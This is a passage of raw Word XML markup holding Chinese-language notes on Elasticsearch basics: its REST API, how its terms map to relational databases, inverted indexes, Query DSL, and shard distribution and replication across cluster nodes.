        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>类型</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>文档</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>字段</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00893828" w:rsidRPr="00F41A4C" w:rsidRDefault="00987653" w:rsidP="00057B8E">
      <w:pPr>
        <w:ind w:left="300" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>反向索引</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D7D1F" w:rsidRPr="00F41A4C" w:rsidRDefault="002D7D1F" w:rsidP="002D7D1F">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>基于</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>协议，以</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JSON</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>为数据交互格式的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RESTful API</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115DDD" w:rsidRPr="00F41A4C" w:rsidRDefault="00115DDD" w:rsidP="000B6857">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Relational DB -&gt; Databases -&gt; Tables -&gt; Rows -&gt; Columns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00115DDD" w:rsidRPr="00F41A4C" w:rsidRDefault="00115DDD" w:rsidP="000B6857">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F7F7F7"/>
        <w:ind w:leftChars="200" w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="2"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Elasticsearch -&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00977B4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Indices</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">   -&gt; Types  -&gt; Documents -&gt; Fields</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D7D1F" w:rsidRPr="008720FE" w:rsidRDefault="002D7D1F" w:rsidP="008720FE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00893828" w:rsidRPr="008720FE" w:rsidRDefault="009D01BD" w:rsidP="004B4B2E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008720FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>传统</w:t>
      </w:r>
      <w:r w:rsidR="00D06525" w:rsidRPr="008720FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>数据库为特定列增加一个索引，例如</w:t>
      </w:r>
      <w:r w:rsidR="00D06525" w:rsidRPr="008720FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>B-Tree</w:t>
      </w:r>
      <w:r w:rsidR="00D06525" w:rsidRPr="008720FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>索引来加速检索。</w:t>
      </w:r>
      <w:r w:rsidR="00D06525" w:rsidRPr="008720FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Elasticsearch</w:t>
      </w:r>
      <w:r w:rsidR="00D06525" w:rsidRPr="008720FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00D06525" w:rsidRPr="008720FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Lucene</w:t>
      </w:r>
      <w:r w:rsidR="00D06525" w:rsidRPr="008720FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>使用一种叫做倒排索引</w:t>
      </w:r>
      <w:r w:rsidR="00D06525" w:rsidRPr="008720FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(inverted index)</w:t>
      </w:r>
      <w:r w:rsidR="00D06525" w:rsidRPr="008720FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的数据结构来达到相同目</w:t>
      </w:r>
      <w:r w:rsidR="006A68CD" w:rsidRPr="008720FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF3C53" w:rsidRPr="008720FE" w:rsidRDefault="00D046F3" w:rsidP="008F3E94">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008720FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Elasticsearch</w:t>
      </w:r>
      <w:r w:rsidRPr="008720FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>提供丰富且灵活的查询语言叫做</w:t>
      </w:r>
      <w:r w:rsidRPr="008720FE">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>DSL</w:t>
      </w:r>
      <w:r w:rsidRPr="008720FE">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>查询</w:t>
      </w:r>
      <w:r w:rsidRPr="008720FE">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(Query DSL)</w:t>
      </w:r>
      <w:r w:rsidRPr="008720FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="008720FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>它允许你构建更加复杂、强大的查询</w:t>
      </w:r>
      <w:r w:rsidR="00EF3C53" w:rsidRPr="008720FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF3C53" w:rsidRPr="008720FE" w:rsidRDefault="00EF3C53" w:rsidP="008720FE">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008720FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Elasticsearch</w:t>
      </w:r>
      <w:r w:rsidRPr="008720FE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>致力于隐藏分布式系统的复杂性。以下这些操作都是在底层自动完成的：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF3C53" w:rsidRPr="00F41A4C" w:rsidRDefault="00EF3C53" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="275" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将你的文档分区到不同的容器或者分片</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>shards</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中，它们可以存在于一个或多个节点中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF3C53" w:rsidRPr="00F41A4C" w:rsidRDefault="00EF3C53" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="275" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将分片均匀的分配到各个节点，</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>对索引和搜索做负载均衡</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF3C53" w:rsidRPr="00F41A4C" w:rsidRDefault="00EF3C53" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="275" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>冗余每一个分片，防止硬件故障造成的数据丢失。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF3C53" w:rsidRPr="00F41A4C" w:rsidRDefault="00EF3C53" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="275" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将集群中任意一个节点上的请求路由到相应数据所在的节点。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EF3C53" w:rsidRPr="00F41A4C" w:rsidRDefault="00EF3C53" w:rsidP="00ED0BCD">
      <w:pPr>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="38"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="275" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>无论是增加节点，还是移除节点，分片都可以做到无缝的扩展和迁移。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00907415" w:rsidRPr="00F41A4C" w:rsidRDefault="00907415" w:rsidP="004B4B2E">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>做为用户，我们能够与集群中的任何节点通信，包括主节点。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>每一个节点都知道文档存在于哪个节点上</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，它们可以转发请求到相应的节点上。我们访问的节点负责收集各节点返回的数据，最后一起返回给客户端。这一切都由</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Elasticsearch</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="17"/>
          <w:szCs w:val="17"/>
